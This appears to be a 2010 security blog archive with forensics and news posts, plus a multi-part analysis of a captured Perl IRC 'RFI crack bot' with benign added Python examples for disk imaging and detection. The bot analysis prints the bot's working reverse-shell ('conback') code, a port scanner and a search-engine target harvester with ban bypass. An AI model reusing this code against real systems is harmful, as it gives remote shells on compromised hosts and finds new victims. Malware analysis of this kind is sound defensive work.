Irregular Expressions


October 12, 2010  8:25 PM

Some more stuff with facebook

Dan O'Connor

An older post from isc.sans.edu about more ‘like’ tricks on Facebook.

http://isc.sans.edu/diary.html?storyid=9556

Not exactly the same as what I previously posted, but it’s something else to read.

This sure helps Facebook live up to its status as the number two threat vector on the internet.

I did find a little more that is related to my last post; here is an article from Sophos.  It’s not exactly the same, but it uses a similar tactic to get users to click on the supplied link.

http://www.sophos.com/blogs/gc/g/2010/04/06/cheryl-cole-pictures-bait-facebook/

The choice of the target age group this time is pretty clear; it should be pretty easy to get access to a lot of profiles.

October 3, 2010  12:21 AM

Something is amiss with JavaScript!

Dan O'Connor

Something strange has been going around the facebooks in the last couple of days; I noticed a few people posting this ‘like’ but did not pay much attention to it.

http://mashable.com/2010/10/01/warning-facebook-like-worm-spreading-through-javascript-exploit/

The story says that it does not appear to do anything bad at this point; if that is the case, you would think something with a payload would follow soon, before it gets patched.


September 26, 2010  11:28 PM

SANS reading room

Dan O'Connor

I like to look around the reading room from time to time for something to read, and I found this one really interesting.

http://computer-forensics.sans.org/community/papers/examining-unknown-image-analysis-compromised-honeypot_200

Forensics is so cool :)

This has an excellent write up from start to finish.


September 26, 2010  10:54 PM

Creating sound disk images

Dan O'Connor

What does that mean?

It means creating an image that has all of the information you are going to need, and preserving as much of that information as possible.

First, capture a snapshot of the target's memory; there are a lot of tools out there to do this. I prefer mdd.  If you can do that, great: you can then use tools like the Volatility framework to do your analysis ( https://www.volatilesystems.com/default/volatility ).

Once you have the memory, take an image of the target disk: pull the power if you can, or do the old hold-the-power-button-down-for-3-seconds trick. Why? We want to capture everything possible; a clean shutdown will let whatever is on there clean up after itself.

Use a tool like dd to capture the disk image; you want to make sure whatever you use captures the slack space on the disk, just in case something is hiding in there.
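As an added example (my own code, not from the post), here is a small Python imager that shows what dd's noerror,sync behaviour buys you for a sound image: every block, slack included, is copied at its original offset, an unreadable block is zero-filled rather than dropped, and the image hash is kept so the copy can be verified later. The sample "device" and the simulated bad sector are constructed.

```python
# Added example, not code from the original post: a minimal block-level imager
# mimicking `dd conv=noerror,sync`. Every block is copied as-is (slack and
# unallocated space included); an unreadable block becomes zero-fill so later
# offsets stay aligned; a SHA-256 of the image is returned for verification.
import hashlib
import os
import tempfile

BLOCK = 512  # sector-sized blocks; a real run would use a larger block size

def image_device(src_path, dst_path, block_size=BLOCK, bad_blocks=()):
    """Copy src_path to dst_path block by block; return (blocks, bad, sha256).
    bad_blocks (constructed) simulates read errors a real device would raise."""
    digest, blocks, bad = hashlib.sha256(), 0, 0
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        while True:
            try:
                if blocks in bad_blocks:
                    raise OSError("simulated unreadable sector")
                chunk = src.read(block_size)
            except OSError:
                # noerror: keep going; sync: put a zero block in its place
                src.seek((blocks + 1) * block_size)
                chunk, bad = b"\x00" * block_size, bad + 1
            if not chunk:
                break  # end of device
            chunk = chunk.ljust(block_size, b"\x00")  # sync: pad a short tail
            dst.write(chunk)
            digest.update(chunk)
            blocks += 1
    return blocks, bad, digest.hexdigest()

def verify_image(img_path, expected_sha256):
    """Re-hash the image; a mismatch means the evidence copy is not sound."""
    with open(img_path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest() == expected_sha256

def demo():
    """Constructed 4-sector 'device': file data, a sector that is mostly slack,
    one unreadable sector, and a sector of leftover deleted data."""
    work = tempfile.mkdtemp()
    dev, img = os.path.join(work, "dev"), os.path.join(work, "dev.dd")
    with open(dev, "wb") as f:
        f.write(b"file data".ljust(BLOCK, b"\x00") + b"SLACK".ljust(BLOCK, b"\x00")
                + b"unreadable".ljust(BLOCK, b"\x00") + b"deleted.txt".ljust(BLOCK, b"\xff"))
    blocks, bad, sha = image_device(dev, img, bad_blocks={2})
    with open(img, "rb") as f:
        data = f.read()
    return (blocks, bad, b"SLACK" in data,
            data[2 * BLOCK:3 * BLOCK] == b"\x00" * BLOCK, verify_image(img, sha))
```

Running demo() shows the slack bytes survive in the image, the bad sector becomes a zero block at the same offset, and the recorded hash verifies.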


September 26, 2010  9:57 PM

Stuxnet update

Dan O'Connor

This article is extremely interesting.

Two quotes really stick out:

“Since reverse engineering chunks of Stuxnet’s massive code, senior US cyber security experts confirm what Mr. Langner, the German researcher, told the Monitor: Stuxnet is essentially a precision, military-grade cyber missile deployed early last year to seek out and destroy one real-world target of high importance – a target still unknown”

“Stuxnet is a 100-percent-directed cyber attack aimed at destroying an industrial process in the physical world,” says Langner, who last week became the first to publicly detail Stuxnet’s destructive purpose and its authors’ malicious intent. “This is not about espionage, as some have said. This is a 100 percent sabotage attack.”

From all of the information I can get, it does seem like this is a weapon.  This is really exciting and scary at the same time.  Something is changing in the world; I don’t think this is the first time there has been weaponized software, and it’s not going to be the last.

http://www.csmonitor.com/USA/2010/0921/Stuxnet-malware-is-weapon-out-to-destroy-Iran-s-Bushehr-nuclear-plant


September 26, 2010  9:10 PM

Sagan Update

Dan O'Connor

Softwink has released an update; they are at version 0.1.5.  The rc script I created won't cut it anymore; it will have to be tweaked.

You don't need to add & on the end of the command; it has a daemonize option now.

You can download it here http://sagan.softwink.com/download/

Enjoy.


September 26, 2010  8:47 PM

Casper RFI crack bot – Part 16 – Last Part

Dan O'Connor

So, looking over all of the scripts, what do we have?

What is in use here is a collection of scripts by various authors of multiple nationalities, in different languages.  This, in a best-case scenario, is a script kiddie, as also suggested by the fact that he left his Gmail address in the script, which was tied back to a Friendster account and a Facebook account.  Would it be fun to friend him? Yeah, it would be; is it the smartest thing to do? Maybe not.  I sure would like to talk to this person and maybe get some idea of the motivation behind the actions, or just make some more links in the community he moves in.

This was worth doing; the sites that I reported as infected to their owners have been cleaned, and it was a lot of fun!


September 26, 2010  12:50 AM

Casper RFI crack bot – Part 15

Dan O'Connor

What this appears to be looking for is more machines to exploit, big surprise!

I followed it back for a bit and this is what I ended up with.

sub se_yahoo {
  my ($chan,$key,$nf) = @_;

sub s_engine {
    my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;

sub s_cari {
  #Type: 1 = Cari saja, 2 = Cari dan eksploit, 3 = Cari dan eksploit Joomla
  my ($chan,$dork,$nf,$bug,$type) = @_;

sub s_scanz {
  my ($to,$bug,$dork,$sb,$type,$autodom) = @_;

if    (($com =~ /^scan\s+(.+?[=])\s+(.*)/) && (fork() == 0))  { s_scanz($dtarget,$1,$2,$hb,1,1); exit;  }

So it will search for whatever is in the second match group of what is supplied.
There are also some other subs in here that are worth mentioning.

One uses a site http://md5.rednoize.com/ to try and find md5 sums.

Another does a geolocation lookup of the machine compromised from what I could tell.


September 26, 2010  12:23 AM

Casper RFI crack bot – Part 14

Dan O'Connor

One more script listed at the top of the main one.

$filebotscan = "scan.txt";

It’s full of all sorts of stuff; nothing really caught my attention until I reached this.

##[ GOOGLE ]##
sub se_google {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my $p = 0;
  #my $url = "http://localhost/search/google.co.id.htm";
  my $url = "http://www.google.com/search?num=".$num."&q=".$key."&start=".$p."&sa=N";
  my $murl = "http://www.google.com";
  my $nxurl;
  my $q = bukasitus($url);
  if ( $q !~ /2010 Google/ ) { msge($chan,"Google","Baned!!"); msge($chan,"Google bypas:",$bypass."key=".$key); @daftar = se_gbypass($chan,$key,$nf); }
  if ( $q =~ /dari sekitar <b>(.+?)<\/b>/ ) {
    my $h = $1; $h =~ s/,//g; msgt($chan,"Google","$h");
  }
  if ( $q =~ /class=b><a href=\"(.*?)\">/ ) {
      my $nxurl = $1; if ($conf{showdbse} == 1){msgn($dbgchan,"Google","$nxurl");}
  }
  while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) { push (@daftar, $1); }
  for ($p=50;$p<=$max;$p+=$num) {
    $nxurl = "http://www.google.co.id/search?num=".$num."&hl=id&q=".$key."&start=".$p."&sa=N";
    $q = bukasitus($nxurl);
    while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }
    if ( $q !~ /<h3 class=r><a href=\"http:\/\/(.*?)\"/ ) { return @daftar;  }
  }
  return @daftar;
}

I wonder what this is doing? A little further down it has a section to get around being banned from Google for launching too many searches.

There are also many other search engines being used, but why?

Whatever is being returned in @daftar is going into this guy.

sub lnk_sortir {
  my @unik = ();
  my %ada  = ();
  foreach my $e ( @_ ) {
    next if $ada{ $e }++;
    push (@unik, $e);
  }
  return @unik;
}

So this is returning the unique results of whatever is being given to it.

Time to take a closer look at that first sub, and what it’s putting into @daftar.

while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }

That makes it easy: it's pulling out the URLs of sites. But what are we searching for to get that list?


September 25, 2010  9:21 PM

Casper RFI crack bot – Part 13

Dan O'Connor

There are a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

We can do some port scans and grab some banners :)

Here is the section for the connect-back: /bin/sh or cmd.exe.

            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
            }

This is handy.

           elsif ($funcarg =~ /^info/) {
           my $sysos = `uname -sr`;
           my $uptime = `uptime`;
           if ( $sysos =~ /freebsd/i ) {
           $sysname = `hostname`;
           $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
           $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
           chomp($memory);
           chomp($swap);
           }
           elsif ( $sysos =~ /linux/i ) {
           $sysname = `hostname -f`;
           $memory = `free -m |grep -i mem | awk '{print \$2}'`;
           $swap = `free -m |grep -i swap | awk '{print \$2}'`;
           chomp($swap);
           chomp($memory);
           }
           else {
           $sysname ="Not Found";;
           $memory ="Not found";
           $swap ="Not Found";
           }
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
           }
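As an added example (mine, not the bot's code or anything from the post), here is a Python check that flags Perl source carrying the connect-back shell and portscan patterns shown above: a raw TCP socket dup'd onto STDIN/STDOUT/STDERR with a shell started over it, and a hard-coded port list with results reported over IRC. The rule names and the two sample scripts are constructed.

```python
# Added example, not code from the post or the bot: a static check that flags
# Perl source carrying the patterns shown above. Rule names are my own.
import re

# Each rule: (name, regexes that must ALL match somewhere in the source)
RULES = [
    ("conback_shell", [
        r"socket\s*\(\s*\w+\s*,\s*PF_INET\s*,\s*SOCK_STREAM",  # raw TCP socket
        r'open\s*\(\s*STDIN\s*,\s*">&',  # STDIN dup'd onto a socket handle
        r'open\s*\(\s*STDOUT\s*,\s*">&',
        r"system\s*\(.*(/bin/sh|cmd\.exe|\$shell)",  # shell wired to it
    ]),
    ("irc_portscan", [
        r"IO::Socket::INET->new\s*\(.*PeerPort",
        r'my\s+@\w+\s*=\s*\(\s*"21"\s*,\s*"22"',  # hard-coded port list
        r"PRIVMSG",  # results are reported back over IRC
    ]),
]

def match_rules(source, rules=RULES):
    """Return the names of the rules whose every pattern matches the source."""
    return [name for name, pats in rules if all(re.search(p, source) for p in pats)]

# Constructed sample made of the bot's fragments (not a runnable bot)
SAMPLE_BOT = r'''
if ($funcarg =~ /^portscan (.*)/) {
  my @portas=("21","22","23","25","80","443");
  my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp');
}
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
  my $shell = "/bin/sh -i";
  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET");
  system("$shell");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :done");
'''

# Constructed benign script: uses a socket but never wires a shell to it
SAMPLE_CLEAN = r'''
use IO::Socket::INET;
my $s = IO::Socket::INET->new(PeerAddr => "localhost", PeerPort => 80, Proto => "tcp");
print $s "GET / HTTP/1.0\r\n\r\n";
'''
```

Requiring every pattern of a rule to match keeps ordinary socket code like SAMPLE_CLEAN from firing; a real deployment would run match_rules over each file found in web roots and temp directories.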

